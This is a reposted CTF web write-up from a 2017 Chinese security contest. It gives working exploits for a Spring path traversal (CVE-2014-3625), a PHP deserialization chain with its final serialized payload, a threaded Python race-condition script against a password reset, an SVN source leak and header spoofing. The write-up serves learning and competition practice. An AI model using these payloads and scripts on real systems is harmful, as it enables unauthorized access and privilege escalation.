碼上快樂

相關內容    簡體    繁體

2017首屆全球華人網絡安全技能大賽-web-writeup

本文轉載自   查看原文   2017-06-12 20:58   1339    ctf

springcss

https://github.com/ilmila/springcss-cve-2014-3625

可以這樣獲取到flag:http://218.2.197.232:18015/spring-css/resources/file:/etc/flag

php序列化

http://wooyun.jozxing.cc/static/drops/tips-3909.html

存儲$_SESSION用php_serialize處理器,讀取數據用php處理器
通過注入 | 字符偽造了對象的序列化數據

<?php
$FLAG = "flag{aaaaaaaa}";
class TOPA {
    public $token;
    public $ticket;
    public $username;
    public $password;
    function __toString() {
        if ($this->username == 'aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb') {
            return 'key is:{' . $this->token . '}' . "\n";
        }
    }
}
class TOPB {
    public $obj;
    public $attr;
    function __construct() {
        $this->attr = null;
        $this->obj = null;
    }
    function __toString() {
        $this->obj = unserialize($this->attr);
        $this->obj->token = $FLAG;
        if ($this->obj->token === $this->obj->ticket) {
            return (string) $this->obj;
        }
    }
}
class TOPC {
    public $obj;
    public $attr;
    function __wakeup() {
        $this->attr = null;
        $this->obj = null;
    }
    function __destruct() {
        echo $this->attr;
    }
}

利用鏈:C的__destruct在echo的時候,可以調用B的__toString,再通過(string)來調用A類的__toString
這里面牽涉到兩個問題,第一個是C中的wakeup,這個可以通過修改屬性名的個數繞過,第二個就是$this->obj->token === $this->obj->ticket
這個可以通過&指向同一變量

<?php
$b = new TOPA;
$b->token = Null;
$b->ticket = &$b->token;
$b->username = 'aaaaaaaaaaaaaaaaa';
$b->password = 'bbbbbbbbbbbbbbbbbb';
echo serialize($b) . "\n\n";

$a = new TOPB;
$a->attr = 'O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}';
$a->obj = '';
// echo serialize($a) . "\n\n";

$c = new TOPC;
$c->attr = $a;
echo serialize($c) . "\n\n";

-------------------------------
最后的payload:
O:4:"TOPC":4:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";s:0:"";s:4:"attr";s:127:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}";}}

學到一個新的標識,R

條件競爭

<?php
header("Content-type: text/html; charset=utf-8");
session_start();

$mysqli = new mysqli("localhost", "root", "", "gctf09");
if ($mysqli->connect_errno) {
    die("數據庫連接錯誤,多次出現請聯系管理員。");
}

//打印源碼
if(isset($_REQUEST['showcode'])){
    highlight_file(___FILE___);
    exit();

}
$user="";
// 初次訪問生成用戶
if(!isset($_SESSION["name"])){
    $user=substr(md5(uniqid().uniqid()),8,16);
    $_SESSION["name"]=$user;
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
    $stmt->bind_param("ss",$user,md5($user));
    $stmt->execute();
    $stmt->close();
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt->close();
}else{
    $user=$_SESSION["name"];
}
//重置時清理用戶信息
if($_SERVER["REQUEST_METHOD"] === "POST" && $_GET['method']==="reset" && isset($_POST['password']) ){
    $stmt = $mysqli->prepare("DELETE FROM gctf09.`user` where name=?");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt = $mysqli->prepare("DELETE FROM gctf09.`priv` where name=?");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
    $stmt->bind_param("ss",$user,md5($_POST['password']));
    $stmt->execute();
    $stmt->close();
    //判斷用戶權限時會查詢priv表,如果為不為TRUE則是管理員權限
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt->close();
    $mysqli->close();
    die("修改成功");
}
$mysqli->close();
?>

python:

#coding=utf8
import requests
from bs4 import BeautifulSoup
import threading

user = ''
def exp():
  global user
  while True:
    s = requests.session()
    r = s.get('http://218.2.197.242:18009/')
    soup = BeautifulSoup(r.content, 'html.parser')
    user = soup.find(id="name")['value']
    print user

    data = {
      'password' : 'helloworld'
    }
    r1 = s.post('http://218.2.197.242:18009/index.php?method=reset',data=data)


def login():
  global user
  while True:
    data = {
      'name' : user,
      'password' : 'helloworld'
    }
    r2 = requests.post('http://218.2.197.242:18009/login.php?method=login',data=data)
    print user,r2.content

def main():
  global user
  threadpool=[]

  for n in xrange(30):
      th = threading.Thread(target=login)
      th.setDaemon(True)
      threadpool.append(th)
  for n in xrange(3):
      th = threading.Thread(target=exp)
      th.setDaemon(True)
      threadpool.append(th)
  for th in threadpool:
      th.start()
  for th in threadpool :
      threading.Thread.join(th)

if __name__ == '__main__':
  main()

web綜合

http://218.2.197.232:18007/
有svn,但是只能通過wc.db來得到hash,然后get到源碼
工具:https://github.com/anantshri/svn-extractor

Forbidden

GET / HTTP/1.1
Host: www.topsec.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98;.NET CLR 8)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://www.baidu.com
Accept-Encoding: gzip, deflate, sdch
Accept-Language: de-DE
Cookie: login=4e7a51334d6a63314e6a553d; PHPSESSID=h2cbas2n7mbli0hkll55sc84o7; 186221D9=1; 6EE211F6=1; 
X-Forwarded-For: localhost
x-requested-with: XMLHttpRequest
Connection: close


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Writeup:第五屆上海市大學生網絡安全大賽-Web "數字經濟"雲安全共測大賽Web-Writeup 2021第二屆“天翼杯”網絡安全攻防大賽writeup 2019西湖論劍網絡安全技能大賽(大學生組)部分WriteUp 西湖論劍2020中國杭州網絡安全技能大賽部分題目WriteUp 2020-第三屆江西省高校網絡安全技能大賽 2020年第二屆“網鼎杯”網絡安全大賽 白虎組 部分題目Writeup 2020數字中國創新大賽-虎符網絡安全賽道丨Web Writeup [第四屆全國中學生網絡安全競賽初賽] Web WriteUp 2020第三屆江西省高校網絡安全技能大賽線下解題賽部分wp
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM